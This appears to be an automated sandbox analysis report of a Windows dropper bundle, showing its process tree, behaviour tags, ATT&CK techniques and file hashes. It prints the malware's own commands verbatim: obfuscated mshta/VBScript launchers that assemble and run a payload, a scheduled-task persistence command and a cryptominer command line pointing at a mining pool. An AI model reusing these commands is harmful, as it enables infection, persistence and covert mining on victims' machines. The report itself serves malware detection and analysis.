C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09d27135e5a8b3b.exe"C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09d27135e5a8b3b.exe" /SILENT2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-KCURF.tmp\Wed09d27135e5a8b3b.tmp"C:\Users\Admin\AppData\Local\Temp\is-KCURF.tmp\Wed09d27135e5a8b3b.tmp" /SL5="$10212,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09d27135e5a8b3b.exe" /SILENT3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-PVPD4.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-PVPD4.tmp\postback.exe" ss14⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09abf83d9c2.exeWed09abf83d9c2.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09abf83d9c2.exe"C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09abf83d9c2.exe" -u2⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed0901eb1dae126e32.exeC:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed0901eb1dae126e32.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed0971f17486f8.exeC:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed0971f17486f8.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed0901eb1dae126e32.exeC:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed0901eb1dae126e32.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09db0d52c38.exeWed09db0d52c38.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe3⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09d27135e5a8b3b.exeWed09d27135e5a8b3b.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed096a1bff61.exeWed096a1bff61.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\1405251.exe"C:\Users\Admin\AppData\Roaming\1405251.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\7954272.exe"C:\Users\Admin\AppData\Roaming\7954272.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\6640402.exe"C:\Users\Admin\AppData\Roaming\6640402.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\2003872.exe"C:\Users\Admin\AppData\Roaming\2003872.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\7563236.exe"C:\Users\Admin\AppData\Roaming\7563236.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\14498.exe"C:\Users\Admin\AppData\Roaming\14498.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\4965181.exe"C:\Users\Admin\AppData\Roaming\4965181.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1976 -s 15204⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"3⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"5⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"9⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"6⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5088 -s 8084⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5088 -s 7924⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5088 -s 1884⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5088 -s 8364⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\wangting-game.exe"C:\Users\Admin\AppData\Local\Temp\wangting-game.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=14⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"5⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\10.exe"C:\Users\Admin\AppData\Local\Temp\10.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1360 -s 15004⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"3⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"4⤵
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"5⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"6⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe6⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"7⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"8⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"9⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth8⤵
- Executes dropped EXE
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding B233CA9D9E63B1B2AA5F57E8CEEB897E C2⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding EEB56DA4FA4418A02AC3EC0A611A4A802⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 47744398A8AFD8B79546DA2553027607 E Global\MSI00002⤵
- Blocklisted process makes network request
- Executes dropped EXE
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca (process tree depth 1)
- Modifies registry class
-
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global (process tree depth 1)
-
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global (process tree depth 1)
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global (process tree depth 2)
- Modifies registry class
-
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global (process tree depth 1)
- Process spawned unexpected child process
-
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global (process tree depth 1)
- Process spawned unexpected child process
-
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global (process tree depth 1)
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global (process tree depth 2)
-
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global (process tree depth 1)
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global (process tree depth 2)
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca (process tree depth 1)
-
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} (process tree depth 1)
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca (process tree depth 1)
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding (process tree depth 1)
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca (process tree depth 1)
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca (process tree depth 1)
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca (process tree depth 1)
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca (process tree depth 1)
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca (process tree depth 1)
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca (process tree depth 1)
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca (process tree depth 1)
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca (process tree depth 1)
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca (process tree depth 1)
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca (process tree depth 1)
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding (process tree depth 1)
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca (process tree depth 1)
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca (process tree depth 1)
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca (process tree depth 1)
- Modifies registry class
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service 1
Registry Run Keys / Startup Folder 1
Scheduled Task 1
Defense Evasion
Modify Registry 4
Disabling Security Tools 1
Virtualization/Sandbox Evasion 1
File Permissions Modification 1
Install Root Certificate 1
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Wed0901eb1dae126e32.exe.log
MD5 41fbed686f5700fc29aaccf83e8ba7fd
SHA1 5271bc29538f11e42a3b600c8dc727186e912456
SHA256 df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437
SHA512 234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed0901eb1dae126e32.exe
MD5 199dd8b65aa03e11f7eb6346506d3fd2
SHA1 a04261608dabc8d394dfea558fcaeb216f6335ea
SHA256 6d5f838b8826f5fcfc939db18f02b7703b37f9ecab111bda1aeca6030dd3aa13
SHA512 0d28ba3232fac0caccc63c0b287ddd81bbc8493d8ec6d90b74f6a3d490903efb2e561cb62e6c9bae94f3bf81d6b298f72c02475f13b775312541ea579e2c4228
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed094c47c32b.exe
MD5 b5cfd3a9dc9e645e24c79991bca60460
SHA1 0d6bcdca2121d279bbe87c66cab515ac2478f555
SHA256 852bffb94dbd3ed18ac11311b701ee80400209a19b3660b544146b41fa3b9768
SHA512 55861773c758e5f3cc7440d012d820892f7b9155b542baeab940a8c80fd50ffd1001fca6f9f9dae7eca3ae53919eba795aca53d5bb3aaaf29a111acd016d24e6
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed096a1bff61.exe
MD5 c4d0ec0c74d01acc7135e8045630b182
SHA1 d954fa19b63df6062c013093ed22f8dc5218c48b
SHA256 8d3586126ec20da9b63930b9995d9ad9826540a71fb958431b73ff48ff6b18e2
SHA512 7cc8d2d033447eed31a1ccab040a4b52803f483d7957c488ad2165db4a308b5cf84f8e2420717436bb146e6e5d33b5d65a53b2381e3caec14b092562b940a9ed
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed0971f17486f8.exe
MD5 83be628244555ddba5d7ab7252a10898
SHA1 7a8f6875211737c844fdd14ba9999e9da672de20
SHA256 e86ad9f9c576959b71ef725aaf7d74c0cf19316e1afbda61a8060d130e98fb3f
SHA512 0c09cce580cd0403191a3944f37688c079d79a21dccb014ac748620835eac542a5327a4e325a3dab0cd6c3bd0db6cb523f51bd05b027596e0b8199d0503b78e2
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09977fdc12334.exe
MD5 6843ec0e740bdad4d0ba1dbe6e3a1610
SHA1 9666f20f23ecd7b0f90e057c602cc4413a52d5a3
SHA256 4bb1e9ad4974b57a1364463ca28935d024a217791069dd88bedccca5eaad271a
SHA512 112a327b9e5f2c049177b2f237f5672e12b438e6d620411c7c50d945a8a3d96ec293d85a50392f62651cdf04a9f68d13d542b1626fb81b768eb342077409d6d3
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09abf83d9c2.exe
MD5 03137e005bdf813088f651d5b2b53e5d
SHA1 0aa1fb7e5fc80bed261c805e15ee4e3709564258
SHA256 258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd
SHA512 23bbb89fe88264538461c0eae1437344e9823e245d00f0527424b95d4ca54054c8b411db3c066664617e0df69d1468ff10385841a5f1869a0e480a92abffdddd
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09b2a8bc4f16cb.exe
MD5 94d45a7ff853b3c5d3d441cf87a71688
SHA1 3327a1929c68a160ef6287277d4cff5747d7bb91
SHA256 172362b2f1f5dca51f1520fc186c1e67c7002f924420c5828b90e099e96b0476
SHA512 14d60e3dec00bb95d1ac35b85c4a63aef3f0157a783c79284b874691b14fc73480f34fc95e09a1e4f9a830ed73addbccb21fe99e5a8b7f3c9f6300ae21cca88f
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09b3a5ca1a712d390.exe
MD5 1c80f27a97ac4ce5c1c91705e0921e5a
SHA1 23b8834a95a978b881f67440ceef1046d3172dd1
SHA256 5f3d434aa99f8e88b605495e49588a87fd0aacd47092f149ff795ae983b81ae1
SHA512 31bbd0054559111b8bdbdb89947e02029d1dbe8180996ad16dc732fa317b22a2a56d782f3f563f6261e14c66fae3f4603721d473a3ec2b22470ac971edff0702
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09c42cad92c20f79.exe
MD5 48c91156511d520353b21c4df6253944
SHA1 a5fffe608205c897fea58541ae844d30a2fa4a0f
SHA256 bb8872a748020b855eacb3df80cc431edf7104a4bdd3805f0a8bb31341cb3b92
SHA512 fb95ccf301d3461232d436070ef0710f57137860e63285eaff25ef3f22e5e381278ece8c1a6a52d889ae5a80316a7c41d4176311d32aa1034866bc91a973deaa
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09cfb2f9758281d8.exe
MD5 dcf289d0f7a31fc3e6913d6713e2adc0
SHA1 44be915c2c70a387453224af85f20b1e129ed0f0
SHA256 06edeee5eaf02a2ee9849ca2b8bc9ec67c39c338c9b184c04f5f0da7c6bedfa5
SHA512 7035e016476ce5bd670dc23cf83115bb82b65e58e858e07c843a3e77584a3c0119aaa688f73761ac3388b648ab9dbf88378aa0a6fe82e269b8e9bd347c37ebca
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09d27135e5a8b3b.exe
MD5 9b07fc470646ce890bcb860a5fb55f13
SHA1 ef01d45abaf5060a0b32319e0509968f6be3082f
